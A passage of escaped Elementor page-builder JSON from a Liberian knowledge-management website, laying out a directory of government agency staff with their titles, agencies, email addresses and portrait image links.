href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a 